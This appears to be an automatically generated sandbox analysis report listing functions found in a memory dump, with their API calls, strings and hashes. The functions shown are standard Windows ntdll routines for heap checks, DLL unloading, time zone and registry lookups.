Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireCriticalNodeReleaseRemoveSection$AlternateDebugEnterFreeHeapLeaveModulePrintResourceTimesUnload
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 2596885168-2283098728
Opcode ID: 56f2c4d8b7e7c4909118fe8f19c14356d45fececd53fcd642e81a721e3a3b5cd
Instruction ID: d54ad2627040c4d99ad77186f59ecd69ec1ecfc1438cbfcfb2a7ef61c2927954
Opcode Fuzzy Hash: 56f2c4d8b7e7c4909118fe8f19c14356d45fececd53fcd642e81a721e3a3b5cd
Instruction Fuzzy Hash: FE51E5757007829FD716DF2DC980B1A7BA2BB84314F101A2FE4D28B6D2DF30AA45CB85

Uniqueness

Uniqueness Score: -1.00%

Function 72645275, Relevance: 24.2, APIs: 16, Instructions: 161nativememoryfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(727379A0,?,00000000,?), ref: 7264528F
RtlLeaveCriticalSection.210A(727379A0,727379A0,?,00000000,?), ref: 726452AD

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

ZwFsControlFile.210A(?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,727379A0,727379A0,?,00000000,?), ref: 726A1B48
RtlEnterCriticalSection.210A(727379A0,727379A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,727379A0,727379A0,?,00000000), ref: 726A1BCE
RtlLeaveCriticalSection.210A(727379A0,727379A0,727379A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,727379A0,727379A0,?), ref: 726A1BE0
ZwClose.210A(?,727379A0,727379A0,727379A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,727379A0,727379A0), ref: 726A1BF0
RtlFreeHeap.210A(?,00000000,?,?,727379A0,727379A0,727379A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 726A1C01
ZwClose.210A(?,727379A0,727379A0,727379A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,727379A0,727379A0), ref: 726A1C1F
RtlFreeHeap.210A(?,00000000,727379A0,?,727379A0,727379A0,727379A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 726A1C30

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$CloseEnterFreeHeapLeave$ControlFileOwnerRtlp
String ID:
API String ID: 2872577061-0
Opcode ID: de6ecc5443b34ad821d3f561202d7062fb0e68709ef391c408becf368dc56c27
Instruction ID: 062c173ceb8ed76432361d96f3767304ee71d670479780f006a439e2e40759b1
Opcode Fuzzy Hash: de6ecc5443b34ad821d3f561202d7062fb0e68709ef391c408becf368dc56c27
Instruction Fuzzy Hash: 7051CBB0105786ABD3129F6DC980B1BBBB5FF54710F140A1BE896876D2E734E841CB96

Uniqueness

Uniqueness Score: -1.00%

Function 7267547E, Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 405memorynativeCOMMON

Download Yara Rule

APIs

ZwAllocateVirtualMemory.210A(000000FF,?,00000000,gRgr,00001000,?,00000000,?,?), ref: 72675537
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,00000000,?,?,?,?,?,?,?,?,?,72675267,?,?,?), ref: 726B6015
DbgPrint.210A((UCRBlock->Size >= *Size),00000000,?,?,?,?,?,?,?,?,?,72675267,?,?,?), ref: 726B602D

Strings

gRgr, xrefs: 726754D4, 7267552C, 726B604C
(UCRBlock->Size >= *Size), xrefs: 726B6028
HEAP: , xrefs: 726B601D
`, xrefs: 726B6078
HEAP[%wZ]: , xrefs: 726B6010

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$AllocateMemoryVirtual
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]: $`$gRgr
API String ID: 940795168-3600886524
Opcode ID: 36a699b15d371deec0d9e0600046930632be10a8fdf848176aef7536b07dad85
Instruction ID: cd367404ed1d68165b523e4e54b3b4da3a286e95c30f26a28c3ce817366b295f
Opcode Fuzzy Hash: 36a699b15d371deec0d9e0600046930632be10a8fdf848176aef7536b07dad85
Instruction Fuzzy Hash: D4E18D70A00245DFDB1ACF6CD994BAABBB6FF44304F2041AAE9169B3D5D734E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 726890EA, Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 137nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,000000AC,00000000,?,?,000000AC,?), ref: 72689131
memset.210A(?,00000000,00000118,?,000000AC,?), ref: 72689144

Part of subcall function 72685B88: RtlInitUnicodeString.210A(?,40000000,00000000,?,00000120,?,000000AC), ref: 72685BD7
Part of subcall function 72685B88: RtlInitUnicodeString.210A(?,00000000,00000000,02000000,?), ref: 72685C74
Part of subcall function 72685B88: ZwQueryValueKey.210A(?,?,00000001,00000000,?,40000000,?,00000000,00000000,02000000,?), ref: 72685CA1

ZwClose.210A(?,?,00000000,00000000,00000001), ref: 726892B1

Strings

TimeZoneInformation, xrefs: 7268911B
TimeZoneKeyName, xrefs: 726C091B
StandardStart, xrefs: 726891E9
StandardName, xrefs: 726891D9
DaylightStart, xrefs: 72689235
DaylightName, xrefs: 72689206
DynamicDaylightTimeDisabled, xrefs: 726C092D
StandardBias, xrefs: 726891E1
DaylightBias, xrefs: 72689218
Bias, xrefs: 7268914C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitStringUnicodememset$CloseQueryValue
String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneInformation$TimeZoneKeyName
API String ID: 2235629865-1201810807
Opcode ID: 27754debfb3feaddf5234ced3d337936f7cccb267a8436c694032c543b39af8e
Instruction ID: 1982578b51b10383f75ced52ca78a8353c7b37eef15b6dc4dc45e54541026090
Opcode Fuzzy Hash: 27754debfb3feaddf5234ced3d337936f7cccb267a8436c694032c543b39af8e
Instruction Fuzzy Hash: 5E5103B15083849FE365CF1AD640B8BBBE4FFC8315F108A2FE59997294E77095048F9A

Uniqueness

Uniqueness Score: -1.00%

Function 727043A4, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 114memorynativeCOMMON

Download Yara Rule

APIs

ZwAllocateVirtualMemory.210A(000000FF,?,00000000,?,00001000,00000004,00000000,?,00000000,?,?,72703EB7,?), ref: 727043DF

Part of subcall function 7268A360: LdrInitializeThunk.NTDLL(726D12FF,000000FF,00000000,00000000,0000000C,00001000,00000004,72720200,0000001C,726D1056), ref: 7268A36A

RtlCompareMemory.210A(?,01000000,?,00000000,?,00000000,?,?,72703EB7,?), ref: 727043FE
memcpy.210A(01000000,?,?,00000000,?,00000000,?,?,72703EB7,?), ref: 7270440C
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,?), ref: 72704442
DbgPrint.210A(HEAP: ,?), ref: 7270444F
DbgPrint.210A(Heap %p - headers modified (%p is %lx instead of %lx),?,HEAP: ,HEAP: ,00000000,?), ref: 72704466
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?), ref: 727044BC
DbgPrint.210A(HEAP: ,?,?,?,?,?,?), ref: 727044C9
DbgPrint.210A( This is located in the %s field of the heap header.,?,?,?,?,?,?), ref: 727044DB

Strings

HEAP: , xrefs: 7270444A, 7270445D, 7270445F, 727044C4
This is located in the %s field of the heap header., xrefs: 727044D6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 72704461
HEAP[%wZ]: , xrefs: 7270443D, 727044B7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$Memory$AllocateCompareInitializeThunkVirtualmemcpy
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 4107597528-336120773
Opcode ID: ef36e754e5a6cd007c0e50a019942ea497a6338b6b4a0ef969a2eb1ff72e892e
Instruction ID: c97281962acb512a6f843493aa69123fb52bcd0f73da265e9d1404885d442730
Opcode Fuzzy Hash: ef36e754e5a6cd007c0e50a019942ea497a6338b6b4a0ef969a2eb1ff72e892e
Instruction Fuzzy Hash: A5314675200140EFD722CB6DCA92F5A77E8FF00769F11415BF842DB292EB34A948CB68

Uniqueness

Uniqueness Score: -1.00%

Function 72669110, Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 355COMMON

Download Yara Rule

APIs

bsearch.210A(?,?,00000000,00000018,72679C00), ref: 72669325
RtlCompareUnicodeString.210A(?,?,?), ref: 7266937F
RtlHashUnicodeString.210A(?,?,00000000,?), ref: 726B0969
DbgPrintEx.210A(00000033,00000000,RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.,?,?,?,00000000,?), ref: 726B0985

Strings

SsHd, xrefs: 72669155
SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 726B09B2
SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 726B09CF
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 726B097C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: StringUnicode$CompareHashPrintbsearch
String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
API String ID: 856964118-2905229100
Opcode ID: 561f81032d45d76d4db196d03bd275259f16c4b2d5f87b1088e9bc6384aed996
Instruction ID: 7a44012d854e81e43fb837d3b8f5c513ecbfcf829ef0c0cc528ca0717b3b08bb
Opcode Fuzzy Hash: 561f81032d45d76d4db196d03bd275259f16c4b2d5f87b1088e9bc6384aed996
Instruction Fuzzy Hash: 9AD1AE71A012198FDF15CF9DC8D0AADBBB5FF59314F24409BEC06AB285E3319A51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 726766B4, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

ZwFreeVirtualMemory.210A(000000FF,-00000018,?,00004000,?,-00000007,00000001,?,-00000018,?), ref: 72676744
RtlFillMemoryUlong.210A(00000009,?,FEEEFEEE,?,-00000007,00000001,?,-00000018,?), ref: 726B6F2C

Strings

HEAP: , xrefs: 726B708B
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 726B709E
HEAP[%wZ]: , xrefs: 726B707E

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Memory$FillFreeUlongVirtual
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 3117835691-1340214556
Opcode ID: db82087b9e7f8ca9bf07667c05beab66247decc2cdd345142d87fb529913dc0a
Instruction ID: 1c4918f8ed40154d026ebad59b92761380bf2fd76da61791be50d85adcaa4e6e
Opcode Fuzzy Hash: db82087b9e7f8ca9bf07667c05beab66247decc2cdd345142d87fb529913dc0a
Instruction Fuzzy Hash: 5981BD72200A84EFD716CF6CD994B9ABBF8EF04754F1401AAE5528B7D2D338EA50CB10

Uniqueness

Uniqueness Score: -1.00%

Function 7266C04A, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192nativememoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.210A(?,00000000,?,02BE0000), ref: 7266C087

Part of subcall function 7265A050: RtlImageNtHeaderEx.210A(00000001,?,00000000,00000000,?,?,?,72671387,?,7271F938,00000050,726719D8,?,7266B333,00000000,00000000), ref: 7265A066

Part of subcall function 7266B669: RtlInitUnicodeStringEx.210A(?,?,?), ref: 7266B679

RtlFreeHeap.210A(?,00000000,?,?,7266C371,00000000,?,?,00000000,?,02BE0000), ref: 7266C136
ZwCreateSection.210A(00000000,000F0005,00000000,00000000,02BE0000,08000000,00000000,7266C371,00000000,?,?,00000000,?,02BE0000), ref: 7266C157
ZwMapViewOfSection.210A(00000000,000000FF,00000000,00000000,00000000,?,?,00000001,00000000,02BE0000,00000000,000F0005,00000000,00000000,02BE0000,08000000), ref: 7266C17F
ZwClose.210A(00000000,00000000,000000FF,00000000,00000000,00000000,?,?,00000001,00000000,02BE0000,00000000,000F0005,00000000,00000000,02BE0000), ref: 7266C18F
RtlImageNtHeader.210A(00000000,00000000,000000FF,00000000,00000000,00000000,?,?,00000001,00000000,02BE0000,00000000,000F0005,00000000,00000000,02BE0000), ref: 7266C19E
ZwClose.210A(00000000,?,7266C371,00000000,?,?,00000000,?,02BE0000), ref: 726B1CDE
RtlFreeHeap.210A(?,00000000,?,00000000,?,7266C371,00000000,?,?,00000000,?,02BE0000), ref: 726B1CF0

Part of subcall function 7266C1F6: ZwCreateFile.210A(00000000,80100080,00000018,?,00000000,00000000,00000005,00000001,00000000,00000000,00000000,?,02BE0000,00000000,00000000), ref: 7266C219

ZwClose.210A(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,00000001,00000000,02BE0000,00000000,000F0005,00000000,00000000), ref: 726B1D0E
ZwUnmapViewOfSection.210A(000000FF,00000000,7266C371,00000000,?,?,00000000,?,02BE0000), ref: 726B1D2D

Strings

@, xrefs: 7266C103

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseHeaderImageSection$CreateFreeHeapView$FileInitStringUnicodeUnmap
String ID: @
API String ID: 3014096824-2766056989
Opcode ID: ee9c4bf05ce8a019666ac3f82f914b0cc44fe98234c14e56a5db736969707e36
Instruction ID: f13bb0e241c5678e3b8cc89a01824e05717dbbcd4e841559a7b63744689255a1
Opcode Fuzzy Hash: ee9c4bf05ce8a019666ac3f82f914b0cc44fe98234c14e56a5db736969707e36
Instruction Fuzzy Hash: C8617CB1D00659EFDB12CF9DC944BAEBBB5EF84714F20416BE812A72D0D7789A01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7266A314, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,00000000,00000000,?,?,7266A2EC,00000000,?,00000000,00000000,00000003,00000000,?,?,?,00000000), ref: 7266A33A
RtlGetCurrentServiceSessionId.210A(00000000,00000000,00000000,?,?,7266A2EC,00000000,?,00000000,00000000,00000003,00000000,?,?,?,00000000), ref: 7266A35C
RtlGetCurrentServiceSessionId.210A(00000000,00000000,00000000,?,?,7266A2EC,00000000,?,00000000,00000000,00000003,00000000,?,?,?,00000000), ref: 726B11DC
RtlGetCurrentServiceSessionId.210A ref: 726B1227
RtlInitString.210A(7266A2EC,?,00000000,00000000,00000000,?,?,7266A2EC,00000000,?,00000000,00000000,00000003,00000000,?,?), ref: 726B1259
___swprintf_l.LIBCMT(?,0000000C,#%u,00000000,00000000,00000003,00000000,7266A2EC,?,00000000,00000000,00000000,?,?,7266A2EC,00000000), ref: 726B1287
RtlInitString.210A(?,00000003,00000000,00000003,00000000,7266A2EC,?,00000000,00000000,00000000,?,?,7266A2EC,00000000,?,00000000), ref: 726B1297
RtlAllocateHeap.210A(?,?,?,?,00000003,00000000,00000003,00000000,7266A2EC,?,00000000,00000000,00000000,?,?,7266A2EC), ref: 726B12DC

Strings

#%u, xrefs: 726B127F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession$InitString$AllocateHeap___swprintf_l
String ID: #%u
API String ID: 4125079587-232158463
Opcode ID: a15b2c8fa94b0d274bb11a3b120f1897b2c4798cf62d5f4c9846d75d0d8078cb
Instruction ID: 0e07a5c467c5e4048cfa33c99837ed20ec22609c6ed22e10ee944ee50f7ce874
Opcode Fuzzy Hash: a15b2c8fa94b0d274bb11a3b120f1897b2c4798cf62d5f4c9846d75d0d8078cb
Instruction Fuzzy Hash: 84711E71A00149AFDB05DF9CC980BAEBBF9EF48704F244166E905E7291E738ED51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 72650150, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 132timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.210A(?,727379A0,?,00000000,?,?,?,726A7019,?,00000000,?,?,727379A0), ref: 72650191

Part of subcall function 7270B453: RtlReleaseSRWLockExclusive.210A(?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019,?,00000000,?), ref: 7270B4B5
Part of subcall function 7270B453: RtlReleaseSRWLockExclusive.210A(?,?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019,?,00000000), ref: 7270B4C5
Part of subcall function 7270B453: RtlReleaseSRWLockExclusive.210A(?,?,?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019,?), ref: 7270B4D5
Part of subcall function 7270B453: RtlReleaseSRWLockExclusive.210A(00000000,?,?,?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019), ref: 7270B4EB
Part of subcall function 7270B453: RtlReleaseSRWLockExclusive.210A(?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019,?,00000000,?), ref: 7270B4F7

Strings

, passed to %s, xrefs: 726501EB
HEAP: , xrefs: 726501D0
RtlUnlockHeap, xrefs: 726501E6
Invalid heap signature for heap at %p, xrefs: 726501DC
HEAP[%wZ]: , xrefs: 726501C3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLockRelease$DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 1594443893-3224558752
Opcode ID: 9b346c6847bea322f2d726b9818a72a5b194ad1ed9e1b78adff9519062d4b3cf
Instruction ID: ed21b3dc7aee2badb596fcb12f6992d3d458d65dbf2a0055c70b5daea0ff3526
Opcode Fuzzy Hash: 9b346c6847bea322f2d726b9818a72a5b194ad1ed9e1b78adff9519062d4b3cf
Instruction Fuzzy Hash: 9E4133316006859BD717DBADC584B6A77B4FF48715F10856FE8534B6C1EB74E880C784

Uniqueness

Uniqueness Score: -1.00%

Function 726D154A, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 110memorynativelibraryCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000214,?,00000000,?), ref: 726D156C
ZwQueryInformationProcess.210A(00001000,0000002B,?,00000210,00000000,?,00000000,?), ref: 726D158D
RtlAllocateHeap.210A(?,00000000,?,00001000,0000002B,?,00000210,00000000,?,00000000,?), ref: 726D15E2
RtlAppendUnicodeToString.210A(00001000,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\,?,00000000,?,00001000,0000002B,?,00000210,00000000,?,00000000,?), ref: 726D15FB
RtlAppendUnicodeToString.210A(00001000,00000000,00001000,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\,?,00000000,?,00001000,0000002B,?,00000210,00000000,?,00000000,?), ref: 726D1609
ZwOpenKey.210A(00000000,00000001,00000018,00001000,00000000,00001000,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\,?,00000000,?,00001000,0000002B,?,00000210,00000000,?), ref: 726D1639
LdrQueryImageFileKeyOption.210A(00000000,GlobalFlag,00000004,?,00000004,00000000,00000000,00000001,00000018,00001000,00000000,00001000,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\,?,00000000,?), ref: 726D1653
ZwClose.210A(00000000,00001000,0000002B,?,00000210,00000000,?,00000000,?), ref: 726D1660
RtlFreeHeap.210A(?,00000000,00000000,00001000,0000002B,?,00000210,00000000,?,00000000,?), ref: 726D167A

Strings

GlobalFlag, xrefs: 726D164B
@, xrefs: 726D162C
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 726D15EE

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AppendHeapQueryStringUnicode$AllocateCloseFileFreeImageInformationOpenOptionProcessmemset
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 726850725-4192008846
Opcode ID: 0df3533b611a9d37b027b7cd80434dcaf7032c92bef79cc6fc2954a94a0d9f4e
Instruction ID: e3e47c6e6211d76b9883193038dce4370da2dc5f03f54f245f175d9395d2d972
Opcode Fuzzy Hash: 0df3533b611a9d37b027b7cd80434dcaf7032c92bef79cc6fc2954a94a0d9f4e
Instruction Fuzzy Hash: D8313FB5A0124DABDF10DFA9CD80AEEBB7CEF44344F5444AAEA05E6190D7749A04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 726474EA, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 101nativeCOMMON

Download Yara Rule

APIs

ZwQueryVirtualMemory.210A(000000FF,?,00000000,?,0000001C,00000000,?,?,?), ref: 72647523
ZwProtectVirtualMemory.210A(000000FF,?,?,?,726474B8,000000FF,?,00000000,?,0000001C,00000000,?,?,?), ref: 72647555
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,000000FF,?,?,?,726474B8,000000FF,?,00000000,?,0000001C,00000000,?,?,?), ref: 726A355F
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,000000FF,?,00000000,?,0000001C,00000000,?,?,?), ref: 726A359C
DbgPrint.210A(VirtualQuery Failed 0x%p %x,?,00000000,000000FF,?,00000000,?,0000001C,00000000,?,?,?), ref: 726A35B6

Strings

VirtualProtect Failed 0x%p %x, xrefs: 726A3574
VirtualQuery Failed 0x%p %x, xrefs: 726A35B1
fsr, xrefs: 7264756E
HEAP: , xrefs: 726A3567, 726A35A4
HEAP[%wZ]: , xrefs: 726A355A, 726A3597

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$MemoryVirtual$ProtectQuery
String ID: fsr$HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2351830261-2280588690
Opcode ID: 222cda36f28263c589ebd2198f71c3184fe34aeae0f3761bc181fb073836ac9e
Instruction ID: e9c0dc256863b4b94d073f71700d7e8dc20d3d44c61c937eb67d39d48a141fe7
Opcode Fuzzy Hash: 222cda36f28263c589ebd2198f71c3184fe34aeae0f3761bc181fb073836ac9e
Instruction Fuzzy Hash: 0B31A532A00149AFDB02DB9DC885F9ABBB9EF44765F104157E855AB2C1EF30EE50CA60

Uniqueness

Uniqueness Score: -1.00%

Function 72650310, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(?,?,?,?,?,7264FCF3,?,727379A0), ref: 7265035C
RtlDebugPrintTimes.210A(?,?,?,?,?,7264FCF3,?,727379A0), ref: 726A73CA
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,?,?,?,?,7264FCF3,?,727379A0), ref: 726A73F8
DbgPrint.210A(Invalid heap signature for heap at %p,?,?,?,?,?,7264FCF3,?,727379A0), ref: 726A7411
DbgPrint.210A(, passed to %s,RtlLockHeap,Invalid heap signature for heap at %p,?,?,?,?,?,7264FCF3,?,727379A0), ref: 726A7420
DbgPrint.210A(72626BF8,, passed to %s,RtlLockHeap,Invalid heap signature for heap at %p,?,?,?,?,?,7264FCF3,?,727379A0), ref: 726A742A

Strings

, passed to %s, xrefs: 726A741B
HEAP: , xrefs: 726A7400
Invalid heap signature for heap at %p, xrefs: 726A740C
HEAP[%wZ]: , xrefs: 726A73F3
RtlLockHeap, xrefs: 726A7416

Memory Dump Source

